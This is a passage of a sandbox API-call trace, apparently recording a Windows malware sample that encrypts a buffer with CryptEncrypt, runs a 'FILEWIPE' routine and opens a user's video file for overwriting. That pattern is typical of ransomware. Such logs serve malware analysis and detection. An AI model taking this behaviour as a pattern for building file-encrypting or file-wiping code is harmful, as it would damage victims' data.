hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0194.663] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0194.663] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0194.663] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.663] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0194.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0194.663] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0194.663] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0194.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0194.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0194.663] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0194.664] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.664] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xf4b5, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xf4c0) returned 1 [0194.664] CharLowerBuffW (in: lpsz="byte[62657]", cchLength=0xb | out: lpsz="byte[62657]") returned 0xb [0194.665] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0194.666] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.666] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa6e4c8*, pdwDataLen=0x87e820*=0xf4b5, dwBufLen=0xf4c0 | out: pbData=0xa6e4c8*, pdwDataLen=0x87e820*=0xf4c0) returned 1 [0194.667] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0194.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0194.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0194.667] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0194.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0194.667] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0194.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0194.677] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0194.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0194.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.677] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0194.678] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.678] CryptDestroyKey (hKey=0x90aed8) returned 1 [0194.678] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0194.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0194.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0194.678] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0194.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0194.678] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0194.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0194.678] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0194.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0194.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0194.678] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0194.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.678] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0194.678] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0194.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0194.679] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0194.679] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0194.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0194.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0194.679] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.679] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0194.679] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0194.679] FreeLibrary (hLibModule=0x74f20000) returned 1 [0194.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0194.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0194.681] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0194.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0194.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0194.681] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f5e8260, ftCreationTime.dwHighDateTime=0x1d5dd9d, ftLastAccessTime.dwLowDateTime=0x7011bde0, ftLastAccessTime.dwHighDateTime=0x1d5e2d5, ftLastWriteTime.dwLowDateTime=0x7011bde0, ftLastWriteTime.dwHighDateTime=0x1d5e2d5, nFileSizeHigh=0x0, nFileSizeLow=0xf4b5, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="4Us08VSplrH Ofh79JeB.mkv", cAlternateFileName="4US08V~1.MKV")) returned 0x90ae18 [0194.681] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0194.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0194.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0194.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0194.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0194.681] CharLowerBuffW (in: lpsz="byte[62645]", cchLength=0xb | out: lpsz="byte[62645]") returned 0xb [0194.681] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0194.681] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0194.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0194.682] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0194.682] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0194.682] FreeLibrary (hLibModule=0x75c90000) returned 1 [0194.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0194.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0194.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0194.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0194.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0194.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0194.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0194.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0194.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0194.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0194.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0194.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0194.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0194.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0194.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0194.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0194.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0194.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0194.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0194.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0194.682] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0194.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0194.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0194.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0194.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0194.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0194.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0194.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0194.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0194.683] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0194.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0194.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0194.696] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0194.696] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0194.697] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\4us08vsplrh ofh79jeb.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0194.697] FreeLibrary (hLibModule=0x75990000) returned 1 [0194.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0194.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0194.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0194.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0194.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0194.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0194.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0194.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0194.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0194.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0194.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0194.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0194.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0194.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0194.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0194.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0194.698] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0194.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0194.698] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.698] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0194.699] FreeLibrary (hLibModule=0x75990000) returned 1 [0194.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0194.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0194.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0194.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0194.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0194.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0194.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0194.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0194.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0194.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0194.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0194.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0194.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0194.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0194.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0194.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0194.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0194.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0194.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0194.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0194.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0194.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0194.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0194.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0194.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0194.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0194.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0194.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0194.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0194.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0194.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0194.700] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0194.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0194.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0194.700] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.700] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0194.700] FreeLibrary (hLibModule=0x75990000) returned 1 [0194.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0194.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0194.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: 